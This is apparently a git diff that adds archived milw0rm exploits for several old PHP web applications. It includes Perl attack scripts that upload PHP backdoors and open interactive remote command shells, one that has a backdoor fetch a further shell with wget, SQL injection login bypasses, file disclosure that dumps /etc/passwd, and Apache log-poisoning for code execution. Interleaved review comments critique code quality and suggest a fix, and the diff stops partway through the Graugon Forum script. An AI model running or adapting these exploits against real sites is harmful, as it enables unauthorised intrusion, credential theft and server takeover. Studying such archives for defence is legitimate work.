+ if (($re =~ /g_thumb_worh" type="radio" value="w" checked >/)&&($re =~ /g_twidth" cols="50" value="([0-9]{1,5})">/)) { ($g9,$g10) = ("w",$1); }
+ if (($re =~ /g_thumb_worh" type="radio" value="h" checked >/)&&($re =~ /g_twidth" cols="50" value="([0-9]{1,5})">/)) { ($g9,$g10) = ("h",$1); }
+ if ($re =~ /g_spacing" type="text" id="g_spacing" value="([0-9]{1,5})">/) { $g11 = $1; }
+}
+
+sub banner {
+ print "\n".
+ " ----------------------------------------- \n".
+ " Fhimage Remote Index Change Exploit \n".
+ " Coded by Osirys \n".
+ " [*] The author is not responsable \n".
+ " of any violation \n".
+ " ----------------------------------------- \n\n";
+}
+
+sub help() {
+ my $error = $_[0];
+ if ($error == -1) {
+ &banner;
+ print "\n[-] Bad hostname or missing string to inject! \n";
+ }
+ elsif ($error == -2) {
+ &banner;
+ print "\n[-] Bad hostname address !\n";
+ }
+ print "[*] Usage : perl $0 http://hostname/cms_path string_to_inject\n\n";
+ exit(0);
+}
+
+# milw0rm.com [2009-01-19]
\ No newline at end of file
diff --git a/FlexPHPNews 0.0.6 PRO - Authentication Bypass.txt b/FlexPHPNews 0.0.6 PRO - Authentication Bypass.txt
new file mode 100644
index 0000000..76d7bdd
--- /dev/null
+++ b/FlexPHPNews 0.0.6 PRO - Authentication Bypass.txt
@@ -0,0 +1,42 @@
+[START]
+
+#########################################################################################
+[0x01] Informations:
+
+Script : FlexPHPNews PRO 0.0.6
+Script : FlexPHPNews 0.0.6
+Download : http://www.hotscripts.com/jump.php?listing_id=24219&jump_type=1 [0.0.6 Pro]
+Download : http://www.hotscripts.com/jump.php?listing_id=22130&jump_type=1 [0.0.6]
+Vulnerability : Sql Injection (Auth bypass)
+Author : Osirys
+Contact : osirys[at]live[dot]it
+Notes : Proud to be Italian
+Greets: : XaDoS, x0r, emgent, Jay, str0ke
+
+#########################################################################################
+[0x02] Bug:[Sql Injection (Auth bypass)]
+######
+
+Bugged file is: /[path]/admin/usercheck.php
+
+[CODE]
+
+if (!empty($logincheck)){
+$sql = "select username,adminid from newsadmin where username='$checkuser' and password='$checkpass'";
+$results = $db->select($sql);
+
+[/CODE]
+
+
+[!] EXPLOIT DETAILS:
+
+ [1] Go to /[path]/admin/index.php
+ [2] Put as username and password the following sql code: ' or '1=1
+ [3] You are the admin now, bypass succesfull =)
+
+#########################################################################################
+
+[/END]
+
+# milw0rm.com [2008-12-14]
+
\ No newline at end of file
diff --git a/Flexcustomer 0.0.6 - Admin Authentication Bypass Possible PHP Code Writing.txt b/Flexcustomer 0.0.6 - Admin Authentication Bypass Possible PHP Code Writing.txt
new file mode 100644
index 0000000..903f654
--- /dev/null
+++ b/Flexcustomer 0.0.6 - Admin Authentication Bypass Possible PHP Code Writing.txt
@@ -0,0 +1,56 @@
+[START]
+
+####################################################################################################################
+[0x01] Informations:
+
+Script : Flexcustomer
+Download : http://www.hotscripts.com/jump.php?listing_id=25331&jump_type=1
+Vulnerability : Admin Login Bypass / Possible PHP code writing
+Author : Osirys
+Contact : osirys[at]live[dot]it
+Website : http://osirys.org
+
+
+####################################################################################################################
+[0x02] Bug: [Admin Login Bypass]
+######
+
+Bug: /[path]/admin/usercheek.php
+
+[CODE]
+
+select($sql);
+
+[/CODE]
+
+[!FIX] Escape $checkuser and $checkpass in $sql query.
+
+
+[!] EXPLOIT: /[path]/admin/
+ Put as username and password: ' or '1=1
+ You will log in as admin
+
+####################################################################################################################
+[0x03] Bug: [Possible PHP data writing]
+######
+
+This is not a real bug, but could become it if the administrator doesn't delete the install.php file.
+In fact, data that we put in /[path]/admin/install.php forms will be save in a .php file.
+So, if install.php is not deleted, we can inject php code, and this bug can become a RCE vulnerability.
+
+[!] EXPLOIT:
+ 1) Go at: /[path]/admin/install.php
+ 2) Put as Database Name this simple PHP code: ";system($_GET['cmd']);$a = "k
+ 3) Fill the other form and press Next
+ 4) Execute your cmd: /[path]/const.inc.php?cmd=id
+
+####################################################################################################################
+
+[/END]
+
+# milw0rm.com [2008-12-29]
\ No newline at end of file
diff --git a/Flexphplink Pro - Arbitrary File Upload.pl b/Flexphplink Pro - Arbitrary File Upload.pl
new file mode 100644
index 0000000..efff1d8
--- /dev/null
+++ b/Flexphplink Pro - Arbitrary File Upload.pl
@@ -0,0 +1,215 @@ +#!/usr/bin/perl + +# HAPPY CHRISTMAS !! +# Flexphplink Pro +# http://www.hotscripts.com/jump.php?listing_id=21062&jump_type=1 +# Bug: Arbitrary File Upload +# * I coded this exploit just for fun ;) +# Exploit coded by Osirys +# osirys[at]live[dot]it +# http://osirys.org +# Greets: x0r, miclen, emgent, str0ke, Todd and AlpHaNiX + +# Example: +# osirys[~]>$ perl exp.txt http://localhost/flexphplinkproen/ +# ============================ +# Flexphplink Pro Exploit +# Coded by Osirys +# osirys[at]live[dot]it +# Proud to be italian +# ============================ +# [+] http://localhost/flexphplinkproen/ backdoored, just type your choise: +# 1 - Admin Details Disclosure +# 2 - Arbitrary Command Execution +# 3 - Shell upload +# 4 - Exit +# 1 +# [+] Extracting Admin Login Details . +# [+] Done: +# Username: admin +# Password: adminz +# osirys[~]>$ + + +use HTTP::Request; +use LWP::UserAgent; + + +my $path = "/submitlink.php"; +my $u_path = "/linkphoto/"; +my $l_file = "back.php"; + +my $code = "RCE backdoor

\";if(!empty(\$_GET['cmd'])&&empty". + "(\$_GET['adm'])){echo\"CMD: \";system(\$_GET['cmd']);}elseif((\$_GET". + "['adm']==\"get\")&&empty(\$_GET['cmd'])){if(is_file(\"../const.inc.php3\" )". + "){include('../const.inc.php3');}elseif(is_file(\"../const.inc.php\")){ incl". + "ude ('../const.inc.php');}echo \"Username: \$admin_username\"; echo". + "\"
\"; echo \"Password: \$admin_password\"; } ?>"; + +my $host = $ARGV[0]; + +($host) || help("-1"); +cheek($host) == 1 || help("-2"); +&banner; + +open ($file, ">", $l_file); +print $file "$code\n"; +close ($file); + +$dir = `pwd`; +my $f_path = $dir."/".$l_file; +$f_path =~ s/\n//; + +my $url = $host.$path; +my $ua = LWP::UserAgent->new; +$time = time(); +my $post = $ua->post($url, + Content_Type => 'form-data', + Content => [ + title => 'abco', + url => 'def', + userfile => [$f_path, '.php'], + addlink => 'Add' + ] + ); + +if (($post->is_success)&&($post->as_string=~ /Thank you for your submission/)) { + `rm -rf $f_path`; + cheek_fname($time); + ($rcefile) || die "[-] Unable to find phpscript uploaded\n"; + &go; +} +else { + print "[-] Unable to upload evil php-code !\n"; + exit(0); +} + +sub go() { + my $error = $_[0]; + if ($error == -1) { + print "[-] Bad Choice\n\n"; + } + elsif ($error == -2) { + print "[-] Bad shell url\n\n"; + } + print "[+] $host backdoored, just type your choise:\n". + " 1 - Admin Details Disclosure\n". + " 2 - Arbitrary Command Execution\n". + " 3 - Shell upload\n". + " 4 - Exit\n"; + + $choice = ; + $choice =~ /1|2|3|4/ || go("-1"); + if ($choice == 1) { + &adm_disc; + } + elsif ($choice == 2) { + &exec_cmd; + } + elsif ($choice == 3) { + &shell_up; + } + elsif ($choice == 4) { + print "[-] Quitting ..\n"; + exit(0); + } +} + +sub adm_disc { + print "[+] Extracting Admin Login Details ..\n"; + $exec_url = ($host.$u_path.$time.".php?adm=get"); + $re = query($exec_url); + if ($re =~ /Username: <\/b>(.*)
Password: <\/b>(.*)/) { + my($user,$pass) = ($1,$2); + print "[+] Done: \n". + " Username: $user\n". + " Password: $pass\n"; + } + else { + print "[-] Can't extract Admin Details.\n\n"; + &go; + } +} + +sub exec_cmd { + print "shell\$>\n"; + $cmd = ; + $cmd !~ /exit/ || die "[-] Quitting ..\n"; + $exec_url = ($host.$u_path.$time.".php?cmd=".$cmd); + $re = query($exec_url); + if ($re =~ /CMD: <\/b>(.*)/) { + print "[*] $1\n"; + &exec_cmd; + } + else { + print "[-] Undefined output or bad cmd !\n"; + &exec_cmd; + } +} + +sub shell_up { + print "[+] Type now a link for your .txt shell\n". + " Shell name must be with .txt extension\n"; + $s_link = ; + $s_link =~ /.*\/(.*)\.txt/ || &go("-2"); + $s_name = $1; + $exec_url = ($host.$u_path.$time.".php?cmd=wget ".$s_link); + $exec_url2 = ($host.$u_path.$time.".php?cmd=mv ".$s_name.".txt ".$s_name.".php"); + query($exec_url); query($exec_url2); + print "[+] Your shell should be here: ".$host.$u_path.$s_name.".php\n"; +} + +sub cheek_fname() { + my $time = $_[0]; + my $name = $time.".php"; + $re = query($host.$u_path.$name); + if ($re =~ /RCE backdoor<\/b>/) { + $rcefile = $name; + return; + } +} + +sub query() { + $link = $_[0]; + my $req = HTTP::Request->new(GET => $link); + my $ua = LWP::UserAgent->new(); + $ua->timeout(4); + my $response = $ua->request($req); + return $response->content; +} + +sub cheek() { + my $host = $_[0]; + if ($host =~ /http:\/\/(.*)/) { + return 1; + } + else { + return 0; + } +} + +sub banner { + print "\n". + " ============================ \n". + " Flexphplink Pro Exploit \n". + " Coded by Osirys \n". + " osirys[at]live[dot]it \n". + " Proud to be italian \n". 
+ " ============================ \n\n"; +} + +sub help() { + my $error = $_[0]; + if ($error == -1) { + &banner; + print "\n[-] Cheek that you provide a hostname address!\n"; + } + elsif ($error == -2) { + &banner; + print "\n[-] Bad hostname address !\n"; + } + print "[*] Usage : perl $0 http://hostname/cms_path\n\n"; + exit(0); +} + +# milw0rm.com [2008-12-28] \ No newline at end of file diff --git a/Fluorine CMS 0.1 rc 1 - File Disclosure SQL Injection Command Execution.pl b/Fluorine CMS 0.1 rc 1 - File Disclosure SQL Injection Command Execution.pl new file mode 100644 index 0000000..4191d2c --- /dev/null +++ b/Fluorine CMS 0.1 rc 1 - File Disclosure SQL Injection Command Execution.pl 
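Review bot: `open ($file, ">", $l_file);` is never checked and `$file` is an undeclared global; the script has no `use strict;`/`use warnings;`, so a failed open is silent and the following `print $file "$code\n";` operates on an undefined handle. Change it to `open my $fh, '>', $l_file or die "open $l_file: $!";` and pair it with `close $fh or die "close $l_file: $!";`. The cleanup `` `rm -rf $f_path` `` passes a path derived from `` `pwd` `` through a shell; `unlink $f_path or warn "unlink $f_path: $!";` does the same job without interpreting metacharacters in the working-directory name. The same missing strictures, and a `query()` helper that returns `$response->content` without checking `$response->is_success` (so an error page or timeout body is matched as if it were data), recur as `get_req()` in the Fluorine, Free Arcade and Graugon scripts in this commit.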
@@ -0,0 +1,257 @@ +#!/usr/bin/perl + +# |----------------------------------------------------------------------------------------------------------------------------------| +# | INFORMATIONS | +# |----------------------------------------------------------------------------------------------------------------------------------| +# |Web Application : Fluorine CMS - Halite 0.1 rc 1 | +# |Download : http://garr.dl.sourceforge.net/sourceforge/fluorine/halite-0.1rc1.rar | +# |----------------------------------------------------------------------------------------------------------------------------------| +# |Remote Exploit (File Disclosure + Remote Command Execution via Sql Injection) | +# |by Osirys | +# |osirys[at]autistici[dot]org | +# |osirys.org | +# |Thx&Greets to: evilsocket, Fireshot, Todd and str0ke | +# |----------------------------------------------------------------------------------------------------------------------------------| +# |BUG [Sql Injection] +# | p0c : /[path]/halite.php?action=aff&id=[sql_string] +# |----------------------------------------------------------------------------------------------------------------------------------| +# |This CMS is vulnerable to sql injection. The exploit just use load_file() mysql function to disclosure local file on the server, +# |and uses the '' into dumpfile '' mysql function to save a php shell on the website, so it will allows you to execute commands. +# |The RCE way is more difficult, becouse you need to know the site's path on the server, dumpfile function needs it ! +# |----------------------------------------------------------------------------------------------------------------------------------| + +# ----------------------------------------------------------------------------------------------- +# Exploit in action [>!] 
+# ----------------------------------------------------------------------------------------------- +# osirys[~]>$ perl xploit.txt http://localhost/cms0/ file_disc +# +# ------------------------------------- +# Fluorine CMS Remote Exploit +# Coded by Osirys +# ------------------------------------- +# +# [*] cat /etc/passwd +# root:x:0:0::/root:/bin/bash +# bin:x:1:1:bin:/bin:/bin/false +# daemon:x:2:2:daemon:/sbin:/bin/false +# adm:x:3:4:adm:/var/log:/bin/false +# lp:x:4:7:lp:/var/spool/lpd:/bin/false +# sync:x:5:0:sync:/sbin:/bin/sync +# shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown +# halt:x:7:0:halt:/sbin:/sbin/halt +# mail:x:8:12:mail:/:/bin/false +# news:x:9:13:news:/usr/lib/news:/bin/false +# uucp:x:10:14:uucp:/var/spool/uucppublic:/bin/false +# operator:x:11:0:operator:/root:/bin/bash +# games:x:12:100:games:/usr/games:/bin/false +# ftp:x:14:50::/home/ftp:/bin/false +# smmsp:x:25:25:smmsp:/var/spool/clientmqueue:/bin/false +# mysql:x:27:27:MySQL:/var/lib/mysql:/bin/false +# rpc:x:32:32:RPC portmap user:/:/bin/false +# sshd:x:33:33:sshd:/:/bin/false +# gdm:x:42:42:GDM:/var/state/gdm:/bin/bash +# apache:x:80:80:User for Apache:/srv/httpd:/bin/false +# messagebus:x:81:81:User for D-BUS:/var/run/dbus:/bin/false +# haldaemon:x:82:82:User for HAL:/var/run/hald:/bin/false +# pop:x:90:90:POP:/:/bin/false +# nobody:x:99:99:nobody:/:/bin/false +# osirys:x:1000:100:Giovanni,,,:/home/osirys:/bin/bash + +# [*] cat exit +# [-] Quitting .. +# osirys[~]>$ +# ----------------------------------------------------------------------------------------------- +# osirys[~]>$ perl xploit.txt http://localhost/cms0/ cmd /home/osirys/web/cms0/ +# +# ------------------------------------- +# Fluorine CMS Remote Exploit +# Coded by Osirys +# ------------------------------------- +# +# [*] Injectin php shell thou Sql Injection +# [*] Shell succesfully injected ! +# [&] Hi my master, do your job now [!] 
+# +# shell[localhost]$> id +# uid=80(apache) gid=80(apache) groups=80(apache) +# shell[localhost]$> whoami +# apache +# shell[localhost]$> exit +# [-] Quitting .. +# osirys[~]>$ +# ----------------------------------------------------------------------------------------------- + +use LWP::UserAgent; +use HTTP::Request::Common; + +my $host = $ARGV[0]; +my $expl = $ARGV[1]; +my $fpath = $ARGV[2]; + +my $sql_inj_path = "/halite.php?action=aff&id="; +my $gen_sql_inj = "-1 union all select 1,2,3,4,"; +my $php_c0de = ""; + +$fpath = "/x" if ($expl =~ /file_disc/); +($host,$expl,$fpath) || help("-1"); +cheek($host,$expl,$fpath) == 1 || help("-2"); +&banner; + +$datas = get_input($host); +$datas =~ /(.*) (.*)/; +($h0st,$path) = ($1,$2); + +&file_discl if $expl_way == 1; +&cmd if $expl_way == 2; + +sub file_discl { + print "[*] cat "; + my $file = ; + chomp($file); + $file !~ /exit/ || die "[-] Quitting ..\n"; + if ($file !~ /\/(.*)/) { + print "\n[-] Bad filename !\n"; + &file_discl; + } + my $sql_inj = $sql_inj_path.$gen_sql_inj."load_file(\"".$file."\")"; + my $attack = $host.$sql_inj; + my $re = get_req($attack); + my $content = tag($re); + if ($content =~ /\*\*(.*)(\*\*|\*\*\*)\$\$<\/td>\*\*\$<\/tr>/) { + my $out = $1; + $out =~ s/\$/ /g; + $out =~ s/\*/\n/g; + $out =~ s/$out/$out\n/ if ($out !~ /\n$/); + print "$out\n"; + &file_discl; + } + elsif ($content =~ /\*\*\*\*\$\$<\/td>\*\*\$<\/tr>/) { + $c++; + print "[-] Can't find ".$file." \n"; + $c < 3 || die "[-] File Disclosure failed !\n[-] Something wrong. 
Exploit Failed !\n\n"; + &file_discl; + } +} + +sub cmd { + print "[*] Injectin php shell thou Sql Injection\n"; + my $sql_inj = $sql_inj_path.$gen_sql_inj."'".$php_c0de."' into dumpfile '".$fpath."/shell.php'"; + my $attack = $host.$sql_inj; + get_req($attack); + my $test = get_req($host."shell.php"); + if ($test =~ /st4rt/) { + print "[*] Shell succesfully injected !\n"; + print "[&] Hi my master, do your job now [!]\n\n"; + $exec_path = $host."/shell.php"; + &exec_cmd; + + } + else { + print "[-] Shell not found \n[-] Exploit failed\n\n"; + exit(0); + } +} + +sub exec_cmd() { + $h0st !~ /www\./ || $h0st =~ s/www\.//; + print "shell[$h0st]\$> "; + $cmd = ; + $cmd !~ /exit/ || die "[-] Quitting ..\n"; + my $exec_url = $exec_path."?cmd=".$cmd; + my $re = get_req($exec_url); + my $content = tag($re); + if ($content =~ /st4rt(.*)/) { + my $out = $1; + $out =~ s/\$/ /g; + $out =~ s/\*/\n/g; + chomp($out); + print "$out\n"; + &exec_cmd; + } + else { + $c++; + $cmd =~ s/\n//; + print "bash: ".$cmd.": command not found\n"; + $c < 3 || die "[-] Command are not executed.\n[-] Something wrong. Exploit Failed !\n\n"; + &exec_cmd; + } + +} + +sub get_req() { + $link = $_[0]; + my $req = HTTP::Request->new(GET => $link); + my $ua = LWP::UserAgent->new(); + $ua->timeout(4); + my $response = $ua->request($req); + return $response->content; +} + +sub get_input() { + my $host = $_[0]; + $host =~ /http:\/\/(.*)/; + $s_host = $1; + $s_host =~ /([a-z.-]{1,30})\/(.*)/; + ($h0st,$path) = ($1,$2); + $path =~ s/(.*)/\/$1/; + $full_det = $h0st." 
".$path; + return $full_det; +} + +sub tag() { + my $string = $_[0]; + $string =~ s/ /\$/g; + $string =~ s/\s/\*/g; + return($string); +} + +sub cheek() { + my $host = $_[0]; + my $expl = $_[1]; + my $fpath = $_[2]; + if ($host =~ /http:\/\/(.*)/) { + $ch_host = 1; + } + if ($expl =~ /file_disc/) { + $ch_expl = 1; + $ch_fpath = 1; + $expl_way = 1; + } + elsif ($expl =~ /cmd/) { + $ch_expl = 1; + $expl_way = 2; + } + if ($fpath =~ /\/(.*)/) { + $ch_fpath = 1; + } + return 1 if ((($ch_host)&&($ch_expl)&&($ch_fpath)) == 1); + &help("-2"); +} + +sub banner { + print "\n". + " ------------------------------------- \n". + " Fluorine CMS Remote Exploit \n". + " Coded by Osirys \n". + " ------------------------------------- \n\n"; +} + +sub help() { + my $error = $_[0]; + if ($error == -1) { + &banner; + print "\n[-] Input Error, missed some arguments !\n\n"; + } + elsif ($error == -2) { + &banner; + print "\n[-] Bad arguments !\n\n"; + } + print "[*] Usage : perl $0 http://hostname/cms_path file_disc file\n"; + print " Ex: perl $0 http://site.it/cms/ file_disc /etc/passwd\n"; + print "[*] Usage : perl $0 http://hostname/cms_path cmd path_of_site\n"; + print " Ex: perl $0 http://site.it/cms/ cmd /home/osirys/web/cms/\n\n"; + exit(0); +} + +# milw0rm.com [2009-02-10] \ No newline at end of file diff --git a/Free Arcade Script 1.0 - Local File Inclusion Command Execution.pl b/Free Arcade Script 1.0 - Local File Inclusion Command Execution.pl new file mode 100644 index 0000000..a44ae90 --- /dev/null +++ b/Free Arcade Script 1.0 - Local File Inclusion Command Execution.pl 
@@ -0,0 +1,231 @@ +#!/usr/bin/perl + +# |----------------------------------------------------------------------------------------------------------------------------------| +# | INFORMATIONS | +# |----------------------------------------------------------------------------------------------------------------------------------| +# |Web Application : Free Arcade Script 1.0 | +# |Download : http://freearcadescript.net/download.php?type=zip&name=freearcadescript&size=null&file=freearcadescriptv1.0.zip | +# |----------------------------------------------------------------------------------------------------------------------------------| +# |Remote Command Execution Exploit via Apache Log Injection | +# |by Osirys | +# |osirys[at]autistici[dot]org | +# |osirys.org | +# |Thx&Greets to: evilsocket, Fireshot, Todd, str0ke | +# |----------------------------------------------------------------------------------------------------------------------------------| +# |/[path]/pages/play.php is affected to Local File Inclusion vulnerability: +# |[code] +# |No game selected.'; +# | include ('templates/'.$template.'/footer.php'); +# | exit; +# |} +# |[/code] +# |$template is not declared. So, in case of php.ini configuration : +# |register_globals = On +# |we can set $template value from GET : +# |p0c : /[path]/pages/play.php?template=[lfi]%00 + +# ------------------------------------------------------------------ +# Exploit in action [>!] +# ------------------------------------------------------------------ +# osirys[~]>$ perl lfi.txt http://localhost/freearcadescriptv1.0/ +# +# --------------------------------- +# Free Arcade Script RCE Sploit +# (Log Inj) +# by Osirys +# --------------------------------- +# +# [*] Injecting evil php code .. +# [*] Cheeking for Apache Logs .. +# [*] Apache Log Injection completed +# [*] Path: /var/log/httpd/access_log +# [!] 
Hi my master, do your job now [x] +# +# shell[localhost]$> id +# uid=80(apache) gid=80(apache) groups=80(apache) +# shell[localhost]$> pws +# bash: pws: command not found +# shell[localhost]$> pwd +# /home/osirys/web/freearcadescriptv1.0/pages +# shell[localhost]$> exit +# [-] Quitting .. +# +# osirys[~]>$ +# ------------------------------------------------------------------ + + +use IO::Socket::INET; +use LWP::UserAgent; + +my $host = $ARGV[0]; +my $lfi_path = "/pages/play.php?template="; +my $null_byte = "%00"; +my $rand_a = int(rand 150); +my $rand1 = "1337".$rand_a."1337"; +my $rand_b = int(rand 150); +my $rand2 = "1337".$rand_b."1337"; +my $gotcha = 0; +my $dir_trasv = "../../../../../../../../../.."; +my @logs_dirs = qw( + /var/log/httpd/access_log + /var/log/httpd/access.log + /var/log/httpd/error.log + /var/log/httpd/error_log + /var/log/access_log + /logs/error.log + /logs/access.log + /var/log/apache/error_log + /var/log/apache/error.log + /etc/httpd/logs/access_log + /usr/local/apache/logs/error_log + /etc/httpd/logs/access.log + /etc/httpd/logs/error_log + /etc/httpd/logs/error.log + /usr/local/apache/logs/access_log + /usr/local/apache/logs/access.log + /var/www/logs/access_log + /var/www/logs/access.log + /var/log/apache/access_log + /var/log/apache/access.log + /var/log/access_log + /var/www/logs/error_log + /var/www/logs/error.log + /usr/local/apache/logs/error.log + /var/log/error_log + /apache/logs/error.log + /apache/logs/access.log + ); + +my $php_code = ""; + +($host) || help("-1"); +cheek($host) == 1 || help("-2"); +&banner; + +$datas = get_input($host); +$datas =~ /(.*) (.*)/; +($h0st,$path) = ($1,$2); + + +$sock = IO::Socket::INET->new( + PeerAddr => $h0st, + PeerPort => 80, + Proto => "tcp" + ) || die "Can't connect to $host:80!\n"; + +print "[*] Injecting evil php code ..\n"; + + +print $sock "GET /Osirys_log_inj start0".$rand1.$php_code."0end".$rand2." 
HTTP/1.1\r\n"; +print $sock "Host: ".$host."\r\n"; +print $sock "Connection: close\r\n\r\n"; +close($sock); + +print "[*] Cheeking for Apache Logs ..\n"; + +while (($log = <@logs_dirs>)&&($gotcha != 1)) { + $tmp_path = $host.$lfi_path.$dir_trasv.$log.$null_byte; + $re = get_req($tmp_path); + if ($re =~ /Osirys_log_inj/) { + $gotcha = 1; + $log_path = $tmp_path; + print "[*] Apache Log Injection completed\n"; + print "[*] Path: $log\n"; + print "[!] Hi my master, do your job now [x]\n\n"; + &exec_cmd; + } +} + +$gotcha == 1 || die "[-] Couldn't find Apache Logs\n"; + +sub exec_cmd { + $h0st !~ /www\./ || $h0st =~ s/www\.//; + print "shell[$h0st]\$> "; + $cmd = ; + $cmd !~ /exit/ || die "[-] Quitting ..\n\n"; + $exec_url = $log_path."&cmd=".$cmd; + my $re = get_req($exec_url); + my $content = tag($re); + if ($content =~ m/start0$rand1(.+)\*0end$rand2/g) { + my $out = $1; + $out =~ s/\$/ /g; + $out =~ s/\*/\n/g; + chomp($out); + print "$out\n"; + &exec_cmd; + } + else { + $c++; + $cmd =~ s/\n//; + print "bash: ".$cmd.": command not found\n"; + $c < 3 || die "[-] Command are not executed.\n[-] Something wrong. Exploit Failed !\n\n"; + &exec_cmd; + } + +} + +sub get_req() { + $link = $_[0]; + my $req = HTTP::Request->new(GET => $link); + my $ua = LWP::UserAgent->new(); + $ua->timeout(4); + my $response = $ua->request($req); + return $response->content; +} + +sub cheek() { + my $host = $_[0]; + if ($host =~ /http:\/\/(.*)/) { + return 1; + } + else { + return 0; + } +} + +sub get_input() { + my $host = $_[0]; + $host =~ /http:\/\/(.*)/; + $s_host = $1; + $s_host =~ /([a-z.-]{1,30})\/(.*)/; + ($h0st,$path) = ($1,$2); + $path =~ s/(.*)/\/$1/; + $full_det = $h0st." ".$path; + return $full_det; +} + +sub tag() { + my $string = $_[0]; + $string =~ s/ /\$/g; + $string =~ s/\s/\*/g; + return($string); +} + +sub banner { + print "\n". + " --------------------------------- \n". + " Free Arcade Script RCE Sploit \n". + " (Log Inj) \n". + " by Osirys \n". 
+ " --------------------------------- \n\n"; +} + +sub help() { + my $error = $_[0]; + if ($error == -1) { + &banner; + print "\n[-] Input data failed ! \n"; + } + elsif ($error == -2) { + &banner; + print "\n[-] Bad hostname address !\n"; + } + print "[*] Usage : perl $0 http://hostname/cms_path\n\n"; + exit(0); +} + +# milw0rm.com [2009-02-23] \ No newline at end of file diff --git a/Gallery Kys 1.0 - Admin Password Disclosure Persistent Cross-Site Scripting.txt b/Gallery Kys 1.0 - Admin Password Disclosure Persistent Cross-Site Scripting.txt new file mode 100644 index 0000000..f4289ac --- /dev/null +++ b/Gallery Kys 1.0 - Admin Password Disclosure Persistent Cross-Site Scripting.txt 
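Review bot: `while (($log = <@logs_dirs>)&&($gotcha != 1))` iterates the array through the `<...>` operator, which here is a `glob` of the interpolated list rather than a read loop; it works only because glob splits on whitespace and none of the entries contain wildcard characters. The idiomatic and unambiguous form is `for my $log (@logs_dirs) { ...; last if $gotcha; }`. The same construct appears as `<@error_logs>` in the Graugon script added in this commit. The socket writes (`print $sock ...`) are unchecked, and `$log_path`, `$c` and `$cmd` are undeclared globals; `use strict; use warnings;` at the top would have flagged them.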
@@ -0,0 +1,74 @@
+[START]
+
+#########################################################################################
+[0x01] Informations:
+
+Script : Gallery Kys 1.0
+Download : http://www.advancescripts.com/djump.php?ID=6285
+Vulnerability : Admin Password Disclosure / Permanent XSS
+Author : Osirys
+Contact : osirys[at]live[dot]it
+Website : http://osirys.org
+
+#########################################################################################
+[0x02] Bug: [Admin Password Disclosure]
+######
+
+Bugged file is: /[path]/config.inc
+
+[CODE]
+
+
+[/CODE]
+
+Just going at this path you will get Administrator's password.
+
+[!] FIX: Don't allow direct access to this file and change it's extension with .php
+
+
+[!] EXPLOIT: /[path]/config.inc
+ $adpass="admin_pwd";
+
+#########################################################################################
+[0x03] Bug: [Permanent XSS]
+######
+
+Bugged file is: /[path]/uploadform.php
+
+[CODE]
+
+$fp =fopen($file, "w+");
+$name=stripslashes($name);
+$des=stripslashes($des);
+$code=stripslashes($code);
+$author=stripslashes($author);
+$w ="name=".$name."&price=".$price."&code=".$code."&des=".$des."&author=".$author."&mail=".$mail."&date=".$date."&web=".$web;
+
+[/CODE]
+
+Once we got Administrator's password, we are able to log in.
+
+Login at this path: /[path]/admin.php
+
+Then just go at this path: /[path]/uploadform.php
+
+Fill the forms, and put in description form the following code:
+
+
+After this action, data that we typed in the upload form, will be saved on .txt files.
+In index.php source code, we can see that the script opens the .txt files, and prints
+it's values directly in html code.
+
+
+[!] FIX: Filter variables before printing them in the html code.
+ preg_math the < > " chars. Filter illegal chars.
+
+#########################################################################################
+
+[/END]
+
+# milw0rm.com [2009-01-19]
\ No newline at end of file
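Review bot: The 0x03 FIX line `preg_math the < > " chars. Filter illegal chars.` names a function PHP does not have (`preg_match` is presumably intended) and prescribes character blacklisting, which is the weaker remedy for stored XSS. The quoted code only runs `stripslashes()` on `$name`, `$des`, `$code` and `$author` before writing them out, and the text states that index.php prints the stored values directly into HTML, so the robust fix is output encoding at that point. Suggest rewording to `[!] FIX: Encode each value with htmlspecialchars($value, ENT_QUOTES) where index.php prints it; stripslashes() performs no HTML escaping.`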
diff --git a/Graugon Forum 1 - 'id' Command Injection SQL Injection.pl b/Graugon Forum 1 - 'id' Command Injection SQL Injection.pl
new file mode 100644
index 0000000..948e67e
--- /dev/null
+++ b/Graugon Forum 1 - 'id' Command Injection SQL Injection.pl
@@ -0,0 +1,228 @@ +#!/usr/bin/perl + +# |--------------------------------------------------------------------------------------------------------------------------------------------| +# | INFORMATIONS | +# |--------------------------------------------------------------------------------------------------------------------------------------------| +# |Web Application : Graugon Forum v1 | +# |Download : http://www.graugon.com/forum/forum.zip | +# |--------------------------------------------------------------------------------------------------------------------------------------------| +# |Remote SQL Command Injection Exploit | +# |by Osirys | +# |osirys[at]autistici[dot]org | +# |osirys.org | +# |Greets to: evilsocket, Fireshot, Todd and str0ke | +# |Thank you: milw0rm.com / packetstormsecurity.org / evilsocket.net | +# |--------------------------------------------------------------------------------------------------------------------------------------------| +# |BUG [Sql Injection] +# | p0c : /[path]/view_profile.php?id=[sql_string] +# |SQL Injections used by this sploit : +# |[1] /path]/view_profile.php?id=osirys' union all select concat(details),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,19 from admins_lf2713 order by '* +# |[2] /path]/view_profile.php?id=osirys' union all select load_file('file'),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,19 order by '* +# |[3] /path]/view_profile.php?id=osirys' union all select 'rce',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,19 into outfile 'file +# |--------------------------------------------------------------------------------------------------------------------------------------------| + +#----------------------------------------------------------------------------------------------------------------------------------------------| +# Exploit in action [>!] 
+#----------------------------------------------------------------------------------------------------------------------------------------------| +# osirys[~]>$ perl graugon_forum.txt http://localhost/forum/ +# +# --------------------------- +# Graugon Forum +# Command Inj Exploit +# by Osirys +# --------------------------- +# +# [*] Getting admin login details .. +# [$] User: admin +# [$] Pass: password +# [*] Generating error through GET request .. +# [*] Cheeking Apache Error Log path .. +# [*] Error Log path found -> /var/log/httpd/error_log +# [*] Website path found -> /home/osirys/web/forum/ +# [*] Shell succesfully injected ! +# [&] Hi my master, do your job now [!] +# +# shell[localhost]$> id +# uid=80(apache) gid=80(apache) groups=80(apache) +# shell[localhost]$> pwd +# /home/osirys/web/forum +# shell[localhost]$> exit +# [-] Quitting .. +# osirys[~]>$ +#----------------------------------------------------------------------------------------------------------------------------------------------| + +use IO::Socket; +use LWP::UserAgent; + +my $host = $ARGV[0]; +my $rand = int(rand 9) +1; + +my @error_logs = qw( + /var/log/httpd/error.log + /var/log/httpd/error_log + /var/log/apache/error.log + /var/log/apache/error_log + /var/log/apache2/error.log + /var/log/apache2/error_log + /logs/error.log + /var/log/apache/error_log + /var/log/apache/error.log + /usr/local/apache/logs/error_log + /etc/httpd/logs/error_log + /etc/httpd/logs/error.log + /var/www/logs/error_log + 